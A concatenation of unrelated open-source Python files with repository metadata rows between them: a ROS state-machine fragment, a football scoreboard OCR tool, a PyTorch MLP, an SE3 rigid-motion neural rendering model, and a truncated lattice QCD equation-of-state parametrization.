for state in self._states:
state.stop()
super().stop()
def step(self):
"""Do one step of the parallel state"""
super().step()
for state in self._states:
state.step()
def validate(self):
super().validate()
# Validate child states
for state in self._states:
state.validate()
# Check resource sharing
resource_counts = {}
for state in self._states:
for resource in state.get_required_resources():
if resource not in resource_counts:
resource_counts[resource] = 0
resource_counts[resource] += 1
for resource, count in resource_counts.items():
if count > 1 and isinstance(resource, UniqueResource):
LOGGER.warning(f"UniqueResource {resource} is shared by {count} states in"
f"parallel state {self._name}. This may cause runtime "
"errors or unexpected behavior.")
| LARG/spl-release | src/behavior/behavior/state_machine.py | state_machine.py | py | 22,719 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "rclpy.logging.get_logger",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "rclpy.logging",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "rclpy.node.Node",
"line_number": 86,
"usage_type": "name"
},
{
"api_name": "typing.Iterable"... |
1063868906 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from PIL import Image
from matplotlib import pyplot as plt
import numpy as np
import pytesseract
import cv2
import tkinter as tk
import logging
import time
import re
import threading
# Dimensioning values
# We are defining global variables based on match data in order to isolate the scoreboard
left_x = 170
upper_y = 50
right_x = 540
lower_y = 80
time_divide = 230
time_width = 60
time_position = 'left'
# If time-position = right : scoreboard is on the left and time on the right
# Else if time position = left : scoreboard is on the right and time on the left
# To deal with time.sleep() and effectively end the threads
#time_value = 0
class ImageHandler(object):
def __init__(self, export_path, filename_in):
self.scoreboard_image = None
self.time_image = None
self.time_text = None
self.teams_goals_image = None
self.teams_goals_text = None
self.video_source_path = filename_in
self.export_image_path = export_path + '/football.jpg'
self.export_path = export_path
logging.basicConfig(level=logging.WARNING)
def extract_image_from_video(self):
"""
Extracts image from video and saves on disk with specified period.
:param path_to_video: Path to video and video name with file format
:param export_image_path: Export image path and image name with file format
:return: -
"""
vidcap = cv2.VideoCapture(self.video_source_path)
count = 0
#success = True
image_lst = []
while(True):
vidcap.set(cv2.CAP_PROP_POS_MSEC, (count * 1000))
success, image = vidcap.read()
image_lst.append(image)
# Stop when last frame is identified
if count > 1:
if np.array_equal(image, image_lst[1]):
break
image_lst.pop(0) # Clean the list
# save frame as PNG file
if(ocr.count < ocr.video_length):
try:
cv2.imwrite(self.export_image_path, image)
print('{}.sec reading a new frame: {} '.format(count, success))
count += 1
ocr.count += 1
ocr.eImageExported.set()
time.sleep(1)
except Exception as e:
pass
def localize_scoreboard_image(self):
"""
Finds the scoreboard table in the upper corner, sets scoreboard_image
and exports the picture as 'scoreboard_table.jpg'
:return: True when scoreboard is found
False when scoreboard is not found
"""
# Read a snapshot image from the video and convert to gray
snapshot_image = cv2.imread(self.export_image_path)
grayscale_image = cv2.cvtColor(snapshot_image, cv2.COLOR_BGR2GRAY)
self.scoreboard_image = grayscale_image[upper_y:lower_y,
left_x:right_x]
cv2.imwrite(self.export_path + '/scoreboard_table.jpg',
self.scoreboard_image)
def split_scoreboard_image(self):
"""
Splits the scoeboard image into two parts, sets 'time_image' and 'teams_goals_image'
and exports as 'time_table.jpg' and 'teams_goals_table.jpg'
Left image represents the time.
Right image represents the teams and goals.
:return: -
"""
'''
self.time_image = self.scoreboard_image[:, 0:175]
cv2.imwrite('ocr/img/time_table.jpg', self.time_image)
self.teams_goals_image = self.scoreboard_image[:, 175:]
cv2.imwrite('ocr/img/teams_goals_table.jpg', self.teams_goals_image)
'''
relative_time_divide = time_divide-left_x
time_end = relative_time_divide + time_width
if(time_position == 'right'):
self.time_image = self.scoreboard_image[:,
relative_time_divide:time_end]
cv2.imwrite(self.export_path + '/time_table.jpg', self.time_image)
self.teams_goals_image = self.scoreboard_image[:,
0:relative_time_divide]
cv2.imwrite(self.export_path + '/teams_goals_table.jpg',
self.teams_goals_image)
else:
self.time_image = self.scoreboard_image[:, 0:relative_time_divide]
cv2.imwrite(self.export_path + '/time_table.jpg', self.time_image)
self.teams_goals_image = self.scoreboard_image[:,
relative_time_divide:]
cv2.imwrite(self.export_path + '/teams_goals_table.jpg',
self.teams_goals_image)
def enlarge_scoreboard_images(self, enlarge_ratio):
"""
Enlarges 'time_table.jpg' and 'teams_goals_table.jpg'
:param enlarge_ratio: Defines the enlarging size (e.g 2-3x)
:return: -
"""
self.time_image = cv2.resize(
self.time_image, (0, 0), fx=enlarge_ratio, fy=enlarge_ratio)
self.teams_goals_image = cv2.resize(
self.teams_goals_image, (0, 0), fx=enlarge_ratio, fy=enlarge_ratio)
def _get_time_from_image(self):
"""
Preprocesses time_image transformations for OCR.
Exports 'time_ocr_ready.jpg' after the manipulations.
Reads match time from 'time_ocr_ready.jpg' using Tesseract.
Applies result to time_text.
:return: True: string is found
False: string is not found
"""
# Count nonzero to determine contrast type
ret, threshed_img = cv2.threshold(
self.time_image, 0, 255, cv2.THRESH_OTSU+cv2.THRESH_BINARY_INV)
self.time_image = cv2.GaussianBlur(self.time_image, (3, 3), 0)
kernel = np.ones((3, 3), np.uint8)
self.time_image = cv2.erode(self.time_image, kernel, iterations=1)
self.time_image = cv2.dilate(self.time_image, kernel, iterations=1)
cv2.imwrite(self.export_path + '/time_ocr_ready.jpg', self.time_image)
self.time_text = pytesseract.image_to_string(
Image.open(self.export_path + '/time_ocr_ready.jpg'), config="--psm 6")
logging.info('Time OCR text: {}'.format(self.time_text))
if self.time_text is not None:
return True
return False
def _get_teams_goals_from_image(self):
"""
Preprocesses teams_goals_image with transformations for OCR.
Exports 'teams_goals_ocr_ready.jpg' after the manipulations.
Reads teams and goals information from 'teams_goals_ocr_ready.jpg' using Tesseract.
Applies result to teams_goals_text.
:return: True: string is found
False: string is not found
"""
# Applying Thresholding for Teams goals OCR preprocess
ret, self.teams_goals_image = cv2.threshold(
self.teams_goals_image, 0, 255, cv2.THRESH_OTSU+cv2.THRESH_BINARY_INV)
self.teams_goals_image = cv2.GaussianBlur(
self.teams_goals_image, (3, 3), 0)
kernel = np.ones((3, 3), np.uint8)
#self.teams_goals_image = cv2.erode(self.teams_goals_image, kernel, iterations=1)
self.teams_goals_image = cv2.dilate(
self.teams_goals_image, kernel, iterations=1)
cv2.imwrite(self.export_path + '/teams_goals_ocr_ready.jpg',
self.teams_goals_image)
self.teams_goals_text = pytesseract.image_to_string(
Image.open(self.export_path + '/teams_goals_ocr_ready.jpg'))
logging.info('Teams and goals OCR text: {}'.format(
self.teams_goals_text))
if self.teams_goals_text is not None:
return True
return False
def get_scoreboard_texts(self):
"""
Returns an array of strings including OCR read time, teams and goals texts.
:return: numpy array 'scoreboard_texts'
scoreboard_texts[0] : time text value
scoreboard_texts[1] : teams and goals text value
"""
# Read text values using Tesseract OCR
time_text_exists = self._get_time_from_image()
teams_goals_text_exists = self._get_teams_goals_from_image()
scoreboard_texts = []
# Use values on successful read
if time_text_exists and teams_goals_text_exists:
scoreboard_texts.append(self.time_text)
scoreboard_texts.append(self.teams_goals_text)
scoreboard_texts = np.array(scoreboard_texts)
return scoreboard_texts
def play_match_video(self):
cap = cv2.VideoCapture(self.video_source_path)
count = 0
if(ocr.time_value < ocr.video_length):
while (cap.isOpened()):
cap.set(cv2.CAP_PROP_POS_MSEC, (count * 1000))
ret, frame = cap.read()
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
cv2.imshow('frame', gray)
time.sleep(1)
count += 1
if cv2.waitKey(1) & 0xFF == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
class Match(object):
def __init__(self, export_path, filename_out):
self.scoreboard_text_values = None
self.home_score = 0
self.home_score_temp = 0
self.home_team = None
self.home_team_temp = 0
self.home_team_fullname = None
self.home_team_identified = False
self.opponent_score = 0
self.opponent_score_temp = 0
self.opponent_team = None
self.opponent_team_temp = None
self.opponent_team_fullname = None
self.opponent_team_identified = False
self.match_time = None
self.match_time_temp = None
self._match_time_prev = []
self.export_path = export_path
self.filename_out = filename_out
def analize_scoreboard(self):
while (ocr.count < ocr.video_length):
try:
ocr.eImageExported.wait()
ocr.scoreboard.localize_scoreboard_image()
ocr.scoreboard.split_scoreboard_image()
ocr.scoreboard.enlarge_scoreboard_images(3)
OCR_text = ocr.scoreboard.get_scoreboard_texts()
ocr.football_match.provide_scoreboard_text_values(OCR_text)
ocr.football_match.update_all_match_info()
ocr.football_match.print_all_match_info()
ocr.eImageExported.clear()
except Exception as e:
logging.warning(e)
def provide_scoreboard_text_values(self, scoreboard_text_values):
self.scoreboard_text_values = scoreboard_text_values
def cleanse_match_score(self):
"""
Cleanse home_score_temp and opponent_score_temp values and removes
noisy starters and enders if present
:return: -
"""
score_string = self.scoreboard_text_values[1].split(' ')[1]
result = []
for letter in score_string:
if letter.isdigit():
result += letter
self.home_score_temp = result[0]
self.opponent_score_temp = result[1]
def cleanse_match_teams(self):
"""
Cleanse home_team_temp and opponent_team_temp values and removes
noisy starter or ender if present
:return: -
"""
self.home_team_temp = self.scoreboard_text_values[1].split(' ')[0]
self.opponent_team_temp = self.scoreboard_text_values[1].split(' ')[2]
# Check and remove noisy starters and enders
if not self.home_team_temp[0].isalpha():
self.home_team_temp = self.home_team_temp[1:4]
elif not self.opponent_team_temp[-1].isalpha():
self.opponent_team_temp = self.opponent_team_temp[0:3]
def cleanse_match_time(self):
"""
Cleanse match_time_temp, and removes noisy starter or ender if present
:return: -
"""
self.match_time_temp = self.scoreboard_text_values[0]
# Check for noisy starters and ender and clean if present
letter_ptr = 0
if not self.match_time_temp[letter_ptr].isdigit():
letter_ptr += 1
if not self.match_time_temp[letter_ptr].isdigit():
letter_ptr += 1
self.match_time_temp = self.match_time_temp[letter_ptr:]
logging.info("Time text noisy starter removed.")
elif not self.match_time_temp[-1].isdigit():
self.match_time_temp = self.match_time_temp[0:-1]
logging.info("Time text noisy ender removed.")
def update_match_time(self):
"""
Validates cleansed match_time_temp with regular expression and sets match_time if valid value exists
:return: True: time has been updated
False: time has not been updated
"""
# Check if the OCR read value is valid
time_expr = re.compile('\d\d:\d\d')
res = time_expr.search(self.match_time_temp)
if res is None:
return False
last_valid_timeval = self.match_time_temp[res.start():res.end()]
self._match_time_prev.append(last_valid_timeval)
# Check validity between last time values
if last_valid_timeval < self._match_time_prev[len(self._match_time_prev)-2]:
# Minute error occured - minute remain unchanged
if last_valid_timeval[0:2] < self._match_time_prev[len(self._match_time_prev)-2][0:2]:
logging.warning(
"Minute error occured: minute remain unchanged!")
fixed_minutes = self._match_time_prev[len(
self._match_time_prev)-2][0:2]
last_valid_timeval = fixed_minutes + last_valid_timeval[2:]
else:
# Second error occured - auto increment second
logging.warning(
"Second error occured: auto incremented second!")
seconds = self._match_time_prev[len(
self._match_time_prev)-2][-2:]
fixed_seconds = str(int(seconds)+1)
last_valid_timeval = last_valid_timeval[:-2] + fixed_seconds
# Free unnecessary time values
if len(self._match_time_prev) > 2:
self._match_time_prev.pop(0)
# Write all valid values to a text file for analysis
self.match_time = last_valid_timeval
with open(self.export_path + '/' + self.filename_out, 'a') as f:
f.write("%s,%s\n" % (self.match_time, ocr.count))
return True
def update_match_score(self):
"""
Validates cleansed score with regular expression
:return: True: score matches the regexp
False: score does not match the regexp
"""
score_expr = re.compile('\d-\d')
res = score_expr.search(self.scoreboard_text_values[1])
if res is None:
return False
self.home_score = self.home_score_temp
self.opponent_score = self.opponent_score_temp
return True
def update_match_team(self, selected_team):
"""
Sets cleansed home_team or opponent_team values if not set before
:return: -
"""
if selected_team == 'home':
self.home_team = self.home_team_temp
self.home_team_identified = True
elif selected_team == 'opponent':
self.opponent_team = self.opponent_team_temp
self.opponent_team_identified = True
def update_all_match_info(self):
"""
Attempts to update match infos:
time, teams, score
:return: True: update succeed
False: update failed
"""
if len(self.scoreboard_text_values[0]) > 0 and len(self.scoreboard_text_values[1]) > 0:
try:
# Clean OCR read time value and update time if valid
self.cleanse_match_time()
self.update_match_time()
# Clean OCR read score value and update score if valid
self.cleanse_match_score()
self.update_match_score()
# Clean OCR read team values and set teams if valid and necessary
self.cleanse_match_teams()
if self.home_team_identified is False:
self.update_match_team('home')
if self.opponent_team_identified is False:
self.update_match_team('opponent')
except Exception as e:
logging.info(e)
logging.info("Unable to update match info for some reason")
else:
logging.info("Unable to update match info: no text received!")
def print_all_match_info(self):
home_team_name = self.home_team
opponent_team_name = self.opponent_team
if self.home_team_fullname is not None and self.opponent_team_fullname is not None:
home_team_name = self.home_team_fullname
opponent_team_name = self.opponent_team_fullname
print('{} {} {}-{} {}'.format(self.match_time,
home_team_name,
self.home_score,
self.opponent_score,
opponent_team_name))
# MAIN
# Empty times.txt file
def ocr(export_path, filename_in, filename_out, video_length):
ocr.count = 0
ocr.video_length = video_length
open(export_path+'/' + filename_out, 'w').close()
ocr.eImageExported = threading.Event()
# Create objects and threads
ocr.scoreboard = ImageHandler(export_path, filename_in)
ocr.football_match = Match(export_path, filename_out)
ocr.tImageExtractor = threading.Thread(
None, ocr.scoreboard.extract_image_from_video, name="ImageExtractor")
ocr.tScoreboardAnalyzer = threading.Thread(
None, ocr.football_match.analize_scoreboard, name="ScoreboardAnalyzer")
ocr.tImageExtractor.start()
ocr.tScoreboardAnalyzer.start()
ocr.tImageExtractor.join()
ocr.tScoreboardAnalyzer.join()
if __name__ == '__main__' :
filename_in = 'ocr/tmp/secondmatch.mkv'
export_path = 'ocr/img'
filename_out = 'times.txt'
video_length = 1080
ocr(export_path, filename_in, filename_out, 1080) | BrunoSader/An-emotional-sports-highlight-generator | ocr/final_ocr.py | final_ocr.py | py | 18,525 | python | en | code | 4 | github-code | 36 | [
{
"api_name": "logging.basicConfig",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "logging.WARNING",
"line_number": 46,
"usage_type": "attribute"
},
{
"api_name": "cv2.VideoCapture",
"line_number": 57,
"usage_type": "call"
},
{
"api_name": "cv2.CAP_PRO... |
35153410551 | import torch
import torch.nn as nn
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.fc1 = nn.Linear(784, 256, bias = False)
self.bn1 = nn.BatchNorm1d(256)
self.relu1 = nn.ReLU()
self.fc2 = nn.Linear(256, 128)
self.bn2 = nn.BatchNorm1d(128)
self.relu2 = nn.ReLU()
self.fc3 = nn.Linear(128, 10)
def forward(self, x):
x = torch.flatten(x, 1)
x = self.fc1(x)
x = self.bn1(x)
x = self.relu1(x)
x = self.fc2(x)
x = self.bn2(x)
x = self.relu2(x)
x = self.fc3(x)
return x | Sachi-27/WiDS--Image-Captioning | Week 2/model.py | model.py | py | 649 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "torch.nn.Module",
"line_number": 4,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 4,
"usage_type": "name"
},
{
"api_name": "torch.nn.Linear",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_numbe... |
34203757063 | import torch
import torch.nn as nn
from math import sin, cos
import models
from models.base import BaseModel
from models.utils import chunk_batch
from systems.utils import update_module_step
from nerfacc import ContractionType, OccupancyGrid, ray_marching
from nerfacc.vol_rendering import render_transmittance_from_alpha, rendering
from utils.rotation import R_from_quaternions
@models.register('se3')
class SE3Model(BaseModel):
def setup(self):
self.static_geometry = models.make(self.config.geometry.name, self.config.geometry)
self.static_texture = models.make(self.config.texture.name, self.config.texture)
self.dynamic_geometry = models.make(self.config.geometry.name, self.config.geometry)
self.dynamic_texture = models.make(self.config.texture.name, self.config.texture)
init_angle = self.config.get('init_angle', 0.1)
init_dir = self.config.get('init_dir', [1., 1., 1.])
self.quaternions = nn.Parameter(self.init_quaternions(half_angle=init_angle, init_dir=init_dir), requires_grad=True)
self.translation = nn.Parameter(torch.tensor([0.001, 0.001, 0.001], dtype=torch.float32), requires_grad=True)
self.canonical = 0.5
self.register_buffer('scene_aabb', torch.as_tensor([-self.config.radius, -self.config.radius, -self.config.radius, self.config.radius, self.config.radius, self.config.radius], dtype=torch.float32))
if self.config.grid_prune:
self.grid_warmup = self.config['grid_warmup']
self.occupancy_grid = OccupancyGrid(
roi_aabb=self.scene_aabb,
resolution=128, # the resolution is open to discuss
contraction_type=ContractionType.AABB
)
self.randomized = self.config.randomized
if self.config.white_bkgd:
self.register_buffer('background_color', torch.as_tensor([1.0, 1.0, 1.0], dtype=torch.float32), persistent=False)
self.background_color.to(self.rank)
self.render_step_size = 1.732 * 2 * self.config.radius / self.config.num_samples_per_ray
def update_step(self, epoch, global_step):
update_module_step(self.static_texture, epoch, global_step)
update_module_step(self.dynamic_texture, epoch, global_step)
def occ_eval_fn(x):
density_s, _ = self.static_geometry(x)
x_d = self.rigid_transform(x)
density_d, _ = self.dynamic_geometry(x_d)
density = density_s + density_d
return density[...,None] * self.render_step_size
if self.training and self.config.grid_prune:
self.occupancy_grid.every_n_step(step=global_step, occ_eval_fn=occ_eval_fn, occ_thre=1e-4, warmup_steps=self.grid_warmup)
def isosurface(self):
mesh_s = self.static_geometry.isosurface()
mesh_d = self.dynamic_geometry.isosurface()
return {'static': mesh_s, 'dynamic': mesh_d}
def init_quaternions(self, half_angle, init_dir):
a = torch.tensor([init_dir[0], init_dir[1], init_dir[2]], dtype=torch.float32)
a = torch.nn.functional.normalize(a, p=2., dim=0)
sin_ = sin(half_angle)
cos_ = cos(half_angle)
r = cos_
i = a[0] * sin_
j = a[1] * sin_
k = a[2] * sin_
q = torch.tensor([r, i, j, k], dtype=torch.float32)
return q
def rigid_transform(self, positions, state=0.):
'''
Perform the rigid transformation: R_axis_d,rot_angle(center=axis_o) @ x + t
'''
scaling = (self.canonical - state) / self.canonical
if scaling == 1.:
R = R_from_quaternions(self.quaternions)
positions = torch.matmul(R, positions.T).T
positions = positions + self.translation
elif scaling == -1.:
positions = positions - self.translation
inv_sc = torch.tensor([1., -1., -1., -1]).to(self.quaternions)
inv_q = inv_sc * self.quaternions
R = R_from_quaternions(inv_q)
positions = torch.matmul(R, positions.T).T
else:
raise NotImplementedError
return positions
def forward_(self, rays, scene_state):
rays_o, rays_d = rays[:, 0:3], rays[:, 3:6] # both (N_rays, 3)
def sigma_fn_composite(t_starts, t_ends, ray_indices):
ray_indices = ray_indices.long()
t_origins = rays_o[ray_indices]
t_dirs = rays_d[ray_indices]
positions = t_origins + t_dirs * (t_starts + t_ends) / 2.
sigma_s, _ = self.static_geometry(positions)
positions = self.rigid_transform(positions, scene_state)
sigma_d, _ = self.dynamic_geometry(positions)
sigma = sigma_s + sigma_d
return sigma[...,None]
def rgb_sigma_fn_static(t_starts, t_ends, ray_indices):
ray_indices = ray_indices.long()
t_origins = rays_o[ray_indices]
t_dirs = rays_d[ray_indices]
positions = t_origins + t_dirs * (t_starts + t_ends) / 2.
density, feature = self.static_geometry(positions)
rgb = self.static_texture(feature, t_dirs)
return rgb, density[...,None]
def rgb_sigma_fn_dynamic(t_starts, t_ends, ray_indices):
ray_indices = ray_indices.long()
t_origins = rays_o[ray_indices]
t_dirs = rays_d[ray_indices]
positions = t_origins + t_dirs * (t_starts + t_ends) / 2.
positions = self.rigid_transform(positions, scene_state)
density, feature = self.dynamic_geometry(positions)
dirs_d = self.rigid_transform(t_dirs, scene_state)
rgb = self.dynamic_texture(feature, dirs_d)
return rgb, density[...,None]
def composite_rendering(ray_indices, t_starts, t_ends):
n_rays = rays_o.shape[0]
rgb_s, sigma_s = rgb_sigma_fn_static(t_starts, t_ends, ray_indices)
rgb_d, sigma_d = rgb_sigma_fn_dynamic(t_starts, t_ends, ray_indices)
dists = t_ends - t_starts
alpha_s = 1. - torch.exp(-sigma_s * dists)
alpha_d = 1. - torch.exp(-sigma_d * dists)
alpha_add = 1. - (1. - alpha_s) * (1. - alpha_d)
Ts = render_transmittance_from_alpha(alpha_add, ray_indices=ray_indices)
weights_s = alpha_s * Ts
weights_d = alpha_d * Ts
weights = weights_s + weights_d
# opacity
opacity = self.acc_along_rays(weights, ray_indices, n_rays)
opacity = opacity.squeeze(-1)
# acc color
rgb = weights_s * rgb_s + weights_d * rgb_d
rgb = self.acc_along_rays(rgb, ray_indices, n_rays)
# Background composition.
if self.config.white_bkgd:
rgb = rgb + self.background_color * (1. - opacity[..., None])
# validation and testing
if not self.training:
# depth
depth = weights * ((t_starts + t_ends) * 0.5)
depth = self.acc_along_rays(depth, ray_indices, n_rays)
depth = depth.squeeze(-1)
rgb_s_only, opacity_s, depth_s_only = rendering(t_starts, t_ends, ray_indices, n_rays,
rgb_sigma_fn=rgb_sigma_fn_static,
render_bkgd=self.background_color)
rgb_d_only, opacity_d, depth_d_only = rendering(t_starts, t_ends, ray_indices, n_rays,
rgb_sigma_fn=rgb_sigma_fn_dynamic,
render_bkgd=self.background_color)
return {
'rgb': rgb,
'opacity': opacity,
'depth': depth,
'rgb_s': rgb_s_only,
'rgb_d': rgb_d_only,
'depth_s': depth_s_only,
'depth_d': depth_d_only,
'opacity_s': opacity_s,
'opacity_d': opacity_d,
}
return {
'rgb': rgb,
'rays_valid': opacity > 0,
'opacity': opacity,
}
with torch.no_grad():
ray_indices, t_starts, t_ends = ray_marching(
rays_o, rays_d,
scene_aabb=self.scene_aabb,
grid=self.occupancy_grid if self.config.grid_prune else None,
sigma_fn=sigma_fn_composite,
render_step_size=self.render_step_size,
stratified=self.randomized,
)
render_out = composite_rendering(ray_indices, t_starts, t_ends)
if self.training:
return {
'comp_rgb': render_out['rgb'],
'opacity': render_out['opacity'],
'rays_valid': render_out['rays_valid'],
'num_samples': torch.as_tensor([len(t_starts)], dtype=torch.int32, device=rays.device),
}
return {
'comp_rgb': render_out['rgb'],
'opacity': render_out['opacity'],
'depth': render_out['depth'],
'rgb_s': render_out['rgb_s'],
'rgb_d': render_out['rgb_d'],
'depth_s': render_out['depth_s'],
'depth_d': render_out['depth_d'],
'opacity_s': render_out['opacity_s'],
'opacity_d': render_out['opacity_d'],
}
def forward(self, rays_0, rays_1):
if self.training:
out_0 = self.forward_(rays_0, scene_state=0.)
out_1 = self.forward_(rays_1, scene_state=1.)
else:
out_0 = chunk_batch(self.forward_, self.config.ray_chunk, rays_0, scene_state=0.)
out_1 = chunk_batch(self.forward_, self.config.ray_chunk, rays_1, scene_state=1.)
del rays_0, rays_1
return [{**out_0}, {**out_1}]
def train(self, mode=True):
self.randomized = mode and self.config.randomized
return super().train(mode=mode)
def eval(self):
self.randomized = False
return super().eval()
def regularizations(self, outs):
losses = {}
return losses | 3dlg-hcvc/paris | models/se3.py | se3.py | py | 10,421 | python | en | code | 31 | github-code | 36 | [
{
"api_name": "models.base.BaseModel",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "models.make",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "models.make",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "models.make",
"line... |
2109558152 | import numpy as np
import pandas as pd
from math import factorial, pi
import scipy.optimize
import scipy.misc
import os
import re
import argparse
from sklearn.gaussian_process import GaussianProcessRegressor
from sklearn.gaussian_process.kernels import RBF,ConstantKernel
# for tests
#import matplotlib.pyplot as pl
# directory where the fit_lattice_test.py is located
dir_path = os.path.dirname(os.path.realpath(__file__))
########################################################################
if __name__ == "__main__":
__doc__="""Construct a parametrization (from PhysRevC.100.064910) of the lattice QCD equation of state
(P/T^4, n/T^3, s/T^3, e/T^4) by calling function:
- param(T,muB,muQ,muS)
input: temperature and chemical potentials in [GeV]
output: dictionnary of all quantities ['T','P','s','n_B','n_Q','n_S','e']
Produces lattice data for P/T^4, nB/T^3, s/T^3, e/T^4 as a function of T for a single value of muB:
- lattice_data(EoS,muB)
input: - EoS: - 'muB' refers to the EoS with the condition \mu_Q = \mu_S = 0
- 'nS0' refers to the EoS with the condition <n_S> = 0 & <n_Q> = 0.4 <n_B>
- muB: baryon chemical potential in [GeV]
output: dictionnary of all quantities + error ['T','P','s','n_B','e']
Calculation of the equation of state under the conditions: <n_S> = 0 ; <n_Q> = factQB*<n_B>:
- EoS_nS0(fun,T,muB,**kwargs)
input: - fun: any function which calculate an EoS (by ex: param, HRG, full_EoS)
- T,muB: temperature and baryon chemical potential in [GeV]
output: dictionnary of all quantities ['T','P','s','n_B','e']
"""
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawTextHelpFormatter
)
args = parser.parse_args()
###############################################################################
# J. Phys.: Conf. Ser. 1602 012011
# critical temperature from lattice at \mu_B = 0
Tc0 = 0.158
# expansion coefficients of T_c(\mu_B)
kappa2 = 0.0153
kappa4 = 0.00032
###############################################################################
def Tc_lattice(muB):
"""
Critical temperature as a function of muB from lQCD
J. Phys.: Conf. Ser. 1602 012011
"""
return Tc0*(1.-kappa2*(muB/Tc0)**2.-kappa4*(muB/Tc0)**4.)
###############################################################################
def dTcdmuB_lattice(muB):
"""
Derivative of the critical temperature wrt \mu_B
"""
dTc = -2.*muB*kappa2/Tc0 -4.*(muB**3.)*kappa4/Tc0**3.
return dTc
def Tc_lattice_muBoT(muBoT):
"""
Find the critical temperature Tc for a fixed muB/T
"""
if(muBoT==0):
return Tc_lattice(0.)
else:
xmuB = scipy.optimize.root(lambda muB: muB/Tc_lattice(muB)-muBoT,[muBoT*Tc0],method='lm').x[0]
return Tc_lattice(xmuB)
###############################################################################
# SB limits
###############################################################################
def SB_lim(T,muB,muQ,muS,Nf=3):
"""
SB limit for p,s,n,e,cs^2
"""
Nc = 3 # number of colors
dgq = 2.*Nc # degeneracy factor for quarks
dgg = 2.*(Nc**2.-1.) # degeneracy factor for gluons
# if input is a single temperature value T
if(isinstance(T,float)):
# chemical potential asssociated to each quark
mu_u = 1./3.*muB + 2./3.*muQ
mu_d = 1./3.*muB - 1./3.*muQ
mu_s = 1./3.*muB - 1./3.*muQ - muS
# list of partons corresponding to the given number of flavors
# chemical potentials and charges
if(Nf==0):
list_mu = []
list_B = []
list_Q = []
list_S =[]
elif(Nf==2):
list_mu = [mu_u,mu_d]
list_B = [1./3.,1./3.]
list_Q = [2./3.,-1./3.]
list_S =[0.,0.]
elif(Nf==3):
list_mu = [mu_u,mu_d,mu_s]
list_B = [1./3.,1./3.,1./3.]
list_Q = [2./3.,-1./3.,-1./3.]
list_S = [0.,0.,-1.]
Pgluons = (pi**2)/90.*dgg
Pquarks = dgq*sum([(7*pi**2)/360. + ((mu_q/T)**2)/12. + ((mu_q/T)**4)/(24*pi**2) for mu_q in list_mu])
P = Pgluons+Pquarks
sgluons = 4*(pi**2)/90.*dgg
squarks = dgq*sum([(4*7*pi**2)/360. + 2*((mu_q/T)**2)/12. for mu_q in list_mu])
s = sgluons+squarks
nB = dgq*sum([B_q*((2*(mu_q/T))/12. + (4*(mu_q/T)**3)/(24*pi**2)) for B_q,mu_q in zip(list_B,list_mu)])
nQ = dgq*sum([Q_q*((2*(mu_q/T))/12. + (4*(mu_q/T)**3)/(24*pi**2)) for Q_q,mu_q in zip(list_Q,list_mu)])
nS = dgq*sum([S_q*((2*(mu_q/T))/12. + (4*(mu_q/T)**3)/(24*pi**2)) for S_q,mu_q in zip(list_S,list_mu)])
e = s-P+muB/T*nB+muQ/T*nQ+muS/T*nS
cs2 = 1./3.
# if the input is a list of temperature values
elif(isinstance(T,np.ndarray) or isinstance(T,list)):
P = np.zeros_like(T)
s = np.zeros_like(T)
nB = np.zeros_like(T)
nQ = np.zeros_like(T)
nS = np.zeros_like(T)
e = np.zeros_like(T)
cs2 = 1./3.*np.ones_like(T)
for i,xT in enumerate(T):
# see if arrays are also given for chemical potentials
try:
xmuB = muB[i]
except:
xmuB = muB
try:
xmuQ = muQ[i]
except:
xmuQ = muQ
try:
xmuS = muS[i]
except:
xmuS = muS
result = SB_lim(xT,xmuB,xmuQ,xmuS,Nf=Nf)
P[i] = result['P']
s[i] = result['s']
nB[i] = result['n_B']
nQ[i] = result['n_Q']
nS[i] = result['n_S']
e[i] = result['e']
else:
raise Exception('Problem with input')
return {'P':P,'s':s,'n_B':nB,'n_Q':nQ,'n_S':nS,'e':e,'I':e-3.*P,'cs^2':cs2}
###############################################################################
# import data for the parametrization of susceptibilities
###############################################################################
chi_a = {}
for chi_file in ["/data/chi_a_nS0.csv","/data/chi_a.csv"]:
param_chi_a = pd.read_csv(dir_path+chi_file).to_dict(orient='list')
# scan rows for each chi
for i,chi in enumerate(param_chi_a['chi']):
values = []
# scan columns with coefficients
for j,coeff in enumerate(param_chi_a):
# skip first column which is chi string
if(coeff=='chi'):
continue
# append values
values.append(param_chi_a[coeff][i])
chi_a.update({chi:values})
chi_b = {}
for chi_file in ["/data/chi_b_nS0.csv","/data/chi_b.csv"]:
param_chi_b = pd.read_csv(dir_path+chi_file).to_dict(orient='list')
# scan rows for each chi
for i,chi in enumerate(param_chi_b['chi']):
values = []
# scan columns with coefficients
for j,coeff in enumerate(param_chi_b):
# skip first column which is chi string
if(coeff=='chi'):
continue
# append values
values.append(param_chi_b[coeff][i])
chi_b.update({chi:values})
# list of all susceptibilities
list_chi = list(param_chi_a['chi'])
list_chi_nS0 = ['chiB2_nS0','chiB4_nS0']
########################################################################
# Stefan Boltzmann limit for the susceptibilities
# can be found in PhysRevC.100.064910
chi_SB = dict(zip(list_chi,[19.*pi**2./36.,\
1./3.,2./3.,1.,\
0.,-1./3.,1./3.,\
2./(9.*pi**2.),4./(3*pi**2.),6./pi**2.,\
0.,-2./(9.*pi**2.),2./(9.*pi**2.),\
4./(9.*pi**2.),-2./pi**2.,2./pi**2.,\
4./(9.*pi**2.),2./(3.*pi**2.),2./(3.*pi**2.),\
2./(9.*pi**2.),-2./(9.*pi**2.),-2./(3.*pi**2.)]))
chi_SB.update(dict(zip(list_chi_nS0,[0.1067856506125367,0.0006673764465596013])))
########################################################################
def param_chi(T,quant):
"""
Parametriation of the susceptibilities at as a function of temperature
Ex: param_chi(T,'chiBQS121')
input quant is a string with the format: chiBQS121
input T being a list or a float
"""
tt = T/Tc_lattice(0.)
